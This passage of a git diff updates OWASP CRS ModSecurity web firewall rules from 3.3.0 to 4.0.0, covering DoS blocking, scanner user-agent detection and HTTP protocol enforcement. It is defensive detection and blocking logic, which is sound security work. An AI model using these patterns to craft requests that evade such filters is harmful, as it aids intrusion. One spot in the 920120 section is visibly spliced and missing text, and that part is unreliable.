this rule (912170) in paranoia level 2, where the -# burst counter check (IP:DOS_BURST_COUNTER) hits at greater equal 1. -# -# The blocking is done in phase 1: When the blocking flag is encountered (IP:DOS_BLOCK), -# then the request is dropped without sending a response. If this happens, then a -# counter is # raised (IP:DOS_BLOCK_COUNTER). -# When an IP address is blocked for the first time, then the blocking is reported in a -# message and a flag (IP:DOS_BLOCK_FLAG) is set. This flag expires in 60 seconds. -# When an IP address is blocked and the flag (IP:DOS_BLOCK_FLAG) is set, then the -# blocking is not being reported (to prevent a flood of alerts). When the flag -# (IP:DOS_BLOCK_FLAG) has expired and a new request is being blocked, then the -# counter (IP:DOS_BLOCK_COUNTER) is being reset to 0 and the block is being treated -# as the first block (-> alert). -# In order to be able to display the counter (IP:DOS_BLOCK_COUNTER) and resetting -# it at the same time, we copy the counter (IP:DOS_BLOCK_COUNTER) into a different -# variable (TX:DOS_BLOCK_COUNTER), which is then displayed in turn. -# -# Variables: -# IP:DOS_BLOCK Flag if an IP address should be blocked -# IP:DOS_BLOCK_COUNTER Counter of blocked requests -# IP:DOS_BLOCK_FLAG Flag keeping track of alert. Flag expires after 60 seconds. -# IP:DOS_BURST_COUNTER Burst counter -# IP:DOS_COUNTER Request counter (static resources are ignored) -# TX:DOS_BLOCK_COUNTER Copy of IP:DOS_BLOCK_COUNTER (needed for display reasons) -# TX:DOS_BLOCK_TIMEOUT Period in seconds a blocked IP will be blocked -# TX:DOS_COUNTER_THRESHOLD Limit of requests, where a burst is identified -# TX:DOS_BURST_TIME_SLICE Period in seconds when we will forget a burst -# TX:STATIC_EXTENSIONS Paths which can be ignored with regards to DoS -# -# As a precondition for these rules, please set the following three variables: -# - TX:DOS_BLOCK_TIMEOUT -# - TX:DOS_COUNTER_THRESHOLD -# - TX:DOS_BURST_TIME_SLICE -# -# And make sure that TX:STATIC_EXTENSIONS is also set. -# - -# -# -= Paranoia Level 0 (empty) =- (apply unconditionally) -# - -# -# Skip if variables defining DoS protection are not set -# -SecRule &TX:dos_burst_time_slice "@eq 0" \ - "id:912100,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain,\ - skipAfter:END-DOS-PROTECTION-CHECKS" - SecRule &TX:dos_counter_threshold "@eq 0" \ - "chain" - SecRule &TX:dos_block_timeout "@eq 0" - -SecRule &TX:dos_burst_time_slice "@eq 0" \ - "id:912110,\ - phase:5,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain,\ - skipAfter:END-DOS-PROTECTION-CHECKS" - SecRule &TX:dos_counter_threshold "@eq 0" \ - "chain" - SecRule &TX:dos_block_timeout "@eq 0" - - -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:912011,phase:1,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:912012,phase:2,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION" -# -# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) -# - -# -# -=[ Anti-Automation / DoS Protection : Block ]=- -# - -# -# Block and track # of requests and log -# -SecRule IP:DOS_BLOCK "@eq 1" \ - "id:912120,\ - phase:1,\ - drop,\ - msg:'Denial of Service (DoS) attack identified from %{tx.real_ip} (%{tx.dos_block_counter} hits since last alert)',\ - tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-multi',\ - tag:'paranoia-level/1',\ - tag:'attack-dos',\ - tag:'OWASP_CRS',\ - tag:'capec/1000/210/227/469',\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule &IP:DOS_BLOCK_FLAG "@eq 0" \ - "setvar:'ip.dos_block_counter=+1',\ - setvar:'ip.dos_block_flag=1',\ - setvar:'tx.dos_block_counter=%{ip.dos_block_counter}',\ - setvar:'ip.dos_block_counter=0',\ - expirevar:'ip.dos_block_flag=60'" - - -# -# Block and track # of requests but don't log -# -SecRule IP:DOS_BLOCK "@eq 1" \ - "id:912130,\ - phase:1,\ - drop,\ - t:none,\ - nolog,\ - tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-multi',\ - tag:'paranoia-level/1',\ - tag:'attack-dos',\ - tag:'OWASP_CRS',\ - tag:'capec/1000/210/227/469',\ - ver:'OWASP_CRS/3.3.0',\ - setvar:'ip.dos_block_counter=+1'" - - -# -# -=[ Anti-Automation / DoS Protection: Count requests ]=- -# - -# -# Skip if we have blocked the request -# -SecRule IP:DOS_BLOCK "@eq 1" \ - "id:912140,\ - phase:5,\ - pass,\ - t:none,\ - nolog,\ - tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-multi',\ - tag:'paranoia-level/1',\ - tag:'attack-dos',\ - ver:'OWASP_CRS/3.3.0',\ - skipAfter:END-DOS-PROTECTION-CHECKS" - - -# -# DOS Counter: Count the number of requests to non-static resources -# -SecRule REQUEST_BASENAME "@rx .*?(\.[a-z0-9]{1,10})?$" \ - "id:912150,\ - phase:5,\ - pass,\ - capture,\ - t:none,t:lowercase,\ - nolog,\ - tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-multi',\ - tag:'paranoia-level/1',\ - tag:'attack-dos',\ - tag:'OWASP_CRS',\ - tag:'capec/1000/210/227/469',\ - ver:'OWASP_CRS/3.3.0',\ - setvar:'tx.extension=/%{TX.1}/',\ - chain" - SecRule TX:EXTENSION "!@within %{tx.static_extensions}" \ - "setvar:'ip.dos_counter=+1'" - - -# -# Check DOS Counter -# If the request count is greater than or equal to user settings, -# we raise the burst counter. This happens via two separate rules: -# - 912160: raise from 0 to 1 -# - 912161: raise from 1 to 2 -# -# This approach with two rules avoids raising the burst counter -# from 0 to 2 via two concurrent requests. We do not raise the -# burst counter beyond 2. -# -# -SecRule IP:DOS_COUNTER "@ge %{tx.dos_counter_threshold}" \ - "id:912160,\ - phase:5,\ - pass,\ - t:none,\ - nolog,\ - tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-multi',\ - tag:'paranoia-level/1',\ - tag:'attack-dos',\ - tag:'OWASP_CRS',\ - tag:'capec/1000/210/227/469',\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule &IP:DOS_BURST_COUNTER "@eq 0" \ - "setvar:'ip.dos_burst_counter=1',\ - setvar:'!ip.dos_counter',\ - expirevar:'ip.dos_burst_counter=%{tx.dos_burst_time_slice}'" - - -SecRule IP:DOS_COUNTER "@ge %{tx.dos_counter_threshold}" \ - "id:912161,\ - phase:5,\ - pass,\ - t:none,\ - nolog,\ - tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-multi',\ - tag:'paranoia-level/1',\ - tag:'attack-dos',\ - tag:'OWASP_CRS',\ - tag:'capec/1000/210/227/469',\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule &IP:DOS_BURST_COUNTER "@ge 1" \ - "setvar:'ip.dos_burst_counter=2',\ - setvar:'!ip.dos_counter',\ - expirevar:'ip.dos_burst_counter=%{tx.dos_burst_time_slice}'" - - -# -# Check DOS Burst Counter and set Block -# Check the burst counter - if greater than or equal to 2, then we set the IP -# block variable for a given expiry and issue an alert. -# -SecRule IP:DOS_BURST_COUNTER "@ge 2" \ - "id:912170,\ - phase:5,\ - pass,\ - t:none,\ - log,\ - msg:'Potential Denial of Service (DoS) Attack from %{tx.real_ip} - # of Request Bursts: %{ip.dos_burst_counter}',\ - tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-multi',\ - tag:'paranoia-level/1',\ - tag:'attack-dos',\ - tag:'OWASP_CRS',\ - tag:'capec/1000/210/227/469',\ - ver:'OWASP_CRS/3.3.0',\ - setvar:'ip.dos_block=1',\ - expirevar:'ip.dos_block=%{tx.dos_block_timeout}'" - - - -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:912013,phase:1,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:912014,phase:2,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:912019,phase:5,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION" -# -# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) -# - -# -# Check DOS Burst Counter and set Block -# Check the burst counter - if greater than or equal to 1, then we set the IP -# block variable for a given expiry and issue an alert. -# -# This is a stricter sibling of rule 912170. -# -SecRule IP:DOS_BURST_COUNTER "@ge 1" \ - "id:912171,\ - phase:5,\ - pass,\ - t:none,\ - log,\ - msg:'Potential Denial of Service (DoS) Attack from %{tx.real_ip} - # of Request Bursts: %{ip.dos_burst_counter}',\ - tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-multi',\ - tag:'attack-dos',\ - tag:'paranoia-level/2',\ - tag:'OWASP_CRS',\ - tag:'capec/1000/210/227/469',\ - ver:'OWASP_CRS/3.3.0',\ - setvar:'ip.dos_block=1',\ - expirevar:'ip.dos_block=%{tx.dos_block_timeout}'" - - - -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:912015,phase:1,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:912016,phase:2,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION" -# -# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) -# - - - -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:912017,phase:1,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:912018,phase:2,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION" -# -# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) -# - - - -# -# -= Paranoia Levels Finished =- -# -SecMarker "END-REQUEST-912-DOS-PROTECTION" - -SecMarker "END-DOS-PROTECTION-CHECKS" diff --git a/rules/REQUEST-913-SCANNER-DETECTION.conf b/rules/REQUEST-913-SCANNER-DETECTION.conf index 4001ba83ad..24d23f67c7 100644 --- a/rules/REQUEST-913-SCANNER-DETECTION.conf +++ b/rules/REQUEST-913-SCANNER-DETECTION.conf @@ -1,8 +1,9 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.3.0 +# OWASP CRS ver.4.0.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2024 CRS project. All rights reserved. # -# The OWASP ModSecurity Core Rule Set is distributed under +# The OWASP CRS is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ @@ -13,29 +14,33 @@ -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:913011,phase:1,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:913012,phase:2,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:913011,phase:1,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:913012,phase:2,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" # -# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) +# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # # -# -=[ Vulnerability Scanner Checks ]=- +# -=[ Security Scanner Checks ]=- # -# These rules inspect the default User-Agent and Header values sent by -# various commercial and open source vuln scanners. +# This rule inspects the default User-Agent and Header values sent by +# various commercial and open source scanners, mostly +# security / vulnerability scanners. # -# The following rules contain User-Agent lists: -# 913100 - security scanners (data file scanners-user-agents.data) -# 913101 - scripting/generic HTTP clients (data file scripting-user-agents.data) -# 913102 - web crawlers/bots (data file crawlers-user-agents.data) +# It is based on a curated list of known malicious scanners in widespread use. +# This list is maintained in scanners-user-agents.data. # +# With CRSv4, the project has given up on keeping track of different categories +# of scanners and scripting agents, mostly because it's very hard to draw +# a line between benign, mostly benign and malicious. And because dedicated +# attackers will change the user agent anyways. + SecRule REQUEST_HEADERS:User-Agent "@pmFromFile scanners-user-agents.data" \ "id:913100,\ - phase:2,\ + phase:1,\ block,\ capture,\ - t:none,t:lowercase,\ + t:none,\ msg:'Found User-Agent associated with security scanner',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ @@ -46,148 +51,31 @@ SecRule REQUEST_HEADERS:User-Agent "@pmFromFile scanners-user-agents.data" \ tag:'OWASP_CRS',\ tag:'capec/1000/118/224/541/310',\ tag:'PCI/6.5.10',\ - ver:'OWASP_CRS/3.3.0',\ - severity:'CRITICAL',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ - setvar:'ip.reput_block_flag=1',\ - setvar:'ip.reput_block_reason=%{rule.msg}',\ - expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}'" - -SecRule REQUEST_HEADERS_NAMES|REQUEST_HEADERS "@pmFromFile scanners-headers.data" \ - "id:913110,\ - phase:2,\ - block,\ - capture,\ - t:none,t:lowercase,\ - msg:'Found request header associated with security scanner',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ - tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-multi',\ - tag:'attack-reputation-scanner',\ - tag:'paranoia-level/1',\ - tag:'OWASP_CRS',\ - tag:'capec/1000/118/224/541/310',\ - tag:'PCI/6.5.10',\ - ver:'OWASP_CRS/3.3.0',\ - severity:'CRITICAL',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ - setvar:'ip.reput_block_flag=1',\ - setvar:'ip.reput_block_reason=%{rule.msg}',\ - expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}'" - - - -SecRule REQUEST_FILENAME|ARGS "@pmFromFile scanners-urls.data" \ - "id:913120,\ - phase:2,\ - block,\ - capture,\ - t:none,t:lowercase,\ - msg:'Found request filename/argument associated with security scanner',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ - tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-multi',\ - tag:'attack-reputation-scanner',\ - tag:'paranoia-level/1',\ - tag:'OWASP_CRS',\ - tag:'capec/1000/118/224/541/310',\ - tag:'PCI/6.5.10',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ - setvar:'ip.reput_block_flag=1',\ - setvar:'ip.reput_block_reason=%{rule.msg}',\ - expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}'" - - -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:913013,phase:1,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:913014,phase:2,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" -# -# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) -# + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:913013,phase:1,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:913014,phase:2,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" # -# -=[ Scripting/Generic User-Agents ]=- -# -# This rule detects user-agents associated with various HTTP client libraries -# and scripting languages. Detection suggests attempted access by some -# automated tool. -# -# This rule is a sibling of rule 913100. +# -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # -SecRule REQUEST_HEADERS:User-Agent "@pmFromFile scripting-user-agents.data" \ - "id:913101,\ - phase:2,\ - block,\ - capture,\ - t:none,t:lowercase,\ - msg:'Found User-Agent associated with scripting/generic HTTP client',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ - tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-multi',\ - tag:'attack-reputation-scripting',\ - tag:'OWASP_CRS',\ - tag:'capec/1000/118/224/541/310',\ - tag:'PCI/6.5.10',\ - tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ - severity:'CRITICAL',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}',\ - setvar:'ip.reput_block_flag=1',\ - setvar:'ip.reput_block_reason=%{rule.msg}',\ - expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}'" - -# -# -=[ Crawler User-Agents ]=- -# -# This rule detects user-agents associated with various crawlers, SEO tools, -# and bots, which have been reported to potentially misbehave. -# These crawlers can have legitimate uses when used with authorization. -# -# This rule is a sibling of rule 913100. -# -SecRule REQUEST_HEADERS:User-Agent "@pmFromFile crawlers-user-agents.data" \ - "id:913102,\ - phase:2,\ - block,\ - capture,\ - t:none,t:lowercase,\ - msg:'Found User-Agent associated with web crawler/bot',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ - tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-multi',\ - tag:'attack-reputation-crawler',\ - tag:'OWASP_CRS',\ - tag:'capec/1000/118/224/541/310',\ - tag:'PCI/6.5.10',\ - tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ - severity:'CRITICAL',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}',\ - setvar:'ip.reput_block_flag=1',\ - setvar:'ip.reput_block_reason=%{rule.msg}',\ - expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}'" - -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:913015,phase:1,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:913016,phase:2,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:913015,phase:1,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:913016,phase:2,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" # -# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) +# -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:913017,phase:1,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:913018,phase:2,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:913017,phase:1,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:913018,phase:2,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" # -# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) +# -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # diff --git a/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf b/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf index 54e5fe6a78..f545b3185c 100644 --- a/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf +++ b/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf @@ -1,8 +1,9 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.3.0 +# OWASP CRS ver.4.0.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2024 CRS project. All rights reserved. # -# The OWASP ModSecurity Core Rule Set is distributed under +# The OWASP CRS is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ @@ -13,7 +14,7 @@ # # The purpose of this rules file is to enforce HTTP RFC requirements that state how # the client is supposed to interact with the server. -# https://www.w3.org/Protocols/rfc2616/rfc2616-sec3.html +# https://www.rfc-editor.org/rfc/rfc9110.html @@ -22,10 +23,10 @@ # -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:920011,phase:1,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:920012,phase:2,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:920011,phase:1,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:920012,phase:2,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" # -# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) +# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # # @@ -36,17 +37,22 @@ SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:920012,phase:2,pass,nolog,skipAf # Uses rule negation against the regex for positive security. The regex specifies the proper # construction of URI request lines such as: # -# "http:" "//" host [ ":" port ] [ abs_path [ "?" query ]] +# "http" "://" authority path-abempty [ "?" query ] # # It also outlines proper construction for CONNECT, OPTIONS and GET requests. # +# Regular expression generated from regex-assembly/920100.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 920100 +# # -=[ References ]=- -# https://www.w3.org/Protocols/rfc2616/rfc2616-sec3.html#sec3.2.1 +# https://www.rfc-editor.org/rfc/rfc9110.html#section-4.2.1 # http://capec.mitre.org/data/definitions/272.html # -SecRule REQUEST_LINE "!@rx ^(?i:(?:[a-z]{3,10}\s+(?:\w{3,7}?://[\w\-\./]*(?::\d+)?)?/[^?#]*(?:\?[^#\s]*)?(?:#[\S]*)?|connect (?:\d{1,3}\.){3}\d{1,3}\.?(?::\d+)?|options \*)\s+[\w\./]+|get /[^?#]*(?:\?[^#\s]*)?(?:#[\S]*)?)$" \ +SecRule REQUEST_LINE "!@rx (?i)^(?:get /[^#\?]*(?:\?[^\s\v#]*)?(?:#[^\s\v]*)?|(?:connect (?:(?:[0-9]{1,3}\.){3}[0-9]{1,3}\.?(?::[0-9]+)?|[\--9A-Z_a-z]+:[0-9]+)|options \*|[a-z]{3,10}[\s\v]+(?:[0-9A-Z_a-z]{3,7}?://[\--9A-Z_a-z]*(?::[0-9]+)?)?/[^#\?]*(?:\?[^\s\v#]*)?(?:#[^\s\v]*)?)[\s\v]+[\.-9A-Z_a-z]+)$" \ "id:920100,\ - phase:2,\ + phase:1,\ block,\ t:none,\ msg:'Invalid HTTP Request Line',\ @@ -58,9 +64,9 @@ SecRule REQUEST_LINE "!@rx ^(?i:(?:[a-z]{3,10}\s+(?:\w{3,7}?://[\w\-\./]*(?::\d+ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'WARNING',\ - setvar:'tx.anomaly_score_pl1=+%{tx.warning_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}'" # @@ -75,27 +81,31 @@ SecRule REQUEST_LINE "!@rx ^(?i:(?:[a-z]{3,10}\s+(?:\w{3,7}?://[\w\-\./]*(?::\d+ # # -=[ Rule Logic ]=- # These rules check for the existence of the ' " ; = meta-characters in -# either the file or file name variables. -# HTML entities may lead to false positives, why they are allowed on PL1. -# Negative look behind assertions allow frequently used entities &_; +# either the "name" (FILES) and "filename" (FILES_NAMES) variables. +# HTML entities may lead to false positives, which is why +# frequently used ones, such as "ä", are allowed at PL1. # # -=[ Targets, characters and html entities ]=- # -# 920120: PL1 : FILES_NAMES, FILES -# ['\";=] but allowed: -# &[aAoOuUyY]uml); &[aAeEiIoOuU]circ; &[eEiIoOuUyY]acute; -# &[aAeEiIoOuU]grave; &[cC]cedil; &[aAnNoO]tilde; & ' +# 920120 + 920122: PL1 : FILES_NAMES, FILES +# Disallow ['\";=], except for frequently used HTML entities (see 920120.data). # # 920121: PL2 : FILES_NAMES, FILES -# ['\";=] : ' " ; = meta-characters -# -# Not supported by re2 (?@-]+)*$" \ +# - application/soap+xml; charset=utf-8; action="urn:localhost-hwh#getQuestions" +# - application/*+json + +SecRule REQUEST_HEADERS:Content-Type "!@rx ^[\w/.+*-]+(?:\s?;\s?(?:action|boundary|charset|component|start(?:-info)?|type|version)\s?=\s?['\"\w.()+,/:=?<>@#*-]+)*$" \ "id:920470,\ phase:1,\ block,\ @@ -927,16 +983,16 @@ SecRule REQUEST_HEADERS:Content-Type "!@rx ^[\w/.+-]+(?:\s?;\s?(?:action|boundar tag:'OWASP_CRS',\ tag:'capec/1000/255/153',\ tag:'PCI/12.1',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # In case Content-Type header can be parsed, check the mime-type against # the policy defined in the 'allowed_request_content_type' variable. # To change your policy, edit crs-setup.conf and activate rule 900220. SecRule REQUEST_HEADERS:Content-Type "@rx ^[^;\s]+" \ "id:920420,\ - phase:2,\ + phase:1,\ block,\ capture,\ t:none,\ @@ -950,13 +1006,13 @@ SecRule REQUEST_HEADERS:Content-Type "@rx ^[^;\s]+" \ tag:'OWASP_CRS',\ tag:'capec/1000/255/153',\ tag:'PCI/12.1',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.content_type=|%{tx.0}|',\ chain" SecRule TX:content_type "!@within %{tx.allowed_request_content_type}" \ "t:lowercase,\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # @@ -967,7 +1023,7 @@ SecRule REQUEST_HEADERS:Content-Type "@rx charset\s*=\s*[\"']?([^;\"'\s]+)" \ phase:1,\ block,\ capture,\ - t:none,t:lowercase,\ + t:none,\ msg:'Request content type charset is not allowed by policy',\ logdata:'%{MATCHED_VAR}',\ tag:'application-multi',\ @@ -978,14 +1034,36 @@ SecRule REQUEST_HEADERS:Content-Type "@rx charset\s*=\s*[\"']?([^;\"'\s]+)" \ tag:'OWASP_CRS',\ tag:'capec/1000/255/153',\ tag:'PCI/12.1',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ + setvar:'tx.content_type_charset=|%{tx.1}|',\ chain" - SecRule TX:1 "!@rx ^%{tx.allowed_request_content_type_charset}$" \ - "t:none,\ + SecRule TX:content_type_charset "!@within %{tx.allowed_request_content_type_charset}" \ + "t:lowercase,\ ctl:forceRequestBodyVariable=On,\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" +# +# Restrict charset parameter inside content type header to occur max once. +# +SecRule REQUEST_HEADERS:Content-Type "@rx charset.*?charset" \ + "id:920530,\ + phase:1,\ + block,\ + t:none,t:lowercase,\ + msg:'Multiple charsets detected in content type header',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153',\ + tag:'PCI/12.1',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # Restrict protocol versions. @@ -1005,19 +1083,19 @@ SecRule REQUEST_PROTOCOL "!@within %{tx.allowed_http_versions}" \ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'PCI/6.5.10',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # Restrict file extension # SecRule REQUEST_BASENAME "@rx \.([^.]+)$" \ "id:920440,\ - phase:2,\ + phase:1,\ block,\ capture,\ - t:none,\ + t:none,t:urlDecodeUni,\ msg:'URL file extension is restricted by policy',\ logdata:'%{TX.0}',\ tag:'application-multi',\ @@ -1028,13 +1106,13 @@ SecRule REQUEST_BASENAME "@rx \.([^.]+)$" \ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'PCI/6.5.10',\ - 